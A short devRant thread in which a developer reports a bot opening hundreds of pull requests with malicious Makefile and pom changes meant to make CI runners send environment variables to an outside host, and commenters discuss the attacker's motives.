Learn More
Resend Email
27
alexbrooklyn
1y

A bot just made 519 pull requests with malicious Makefile code to get a github actions server to send a curl to a random host.

It's gonna be one of those days

rant
Favorite
Ranter
Comments
  • 3
    1y
    Update: User is banned now
  • 3
    1y
    Looks like a malfunction - doesn't make sense for a bot to spam a single repo as it increases the likelyhood of sleepy maintainers getting that something is wrong about those pull requests.
  • 2
    1y
    @Oktokolo My mistake, it made prs on different repos with pom and makefile updates, sending the output of set to a random server. The title mentioned a bug bounty, so it's fishing for that
  • 2
    1y
    @alexbrooklyn That's odd. Mentioning wanting money for the fix makes maintainers hunt extra hard for reasons not to accept the pull request.
  • 1
    1y
    @Oktokolo they don't want the pr to be accepted, they want to find holes in whatever ci/cd system is running the pipeline for the pull request
  • 1
    1y
    @alexbrooklyn okay, that makes sense. Well, at least scripting languages always come with automatic memory management - so the most common RCE vectors are already closed...
devRant © 2021 Hexical Labs LLC
Privacy Policy  |  Terms of Service
Add Comment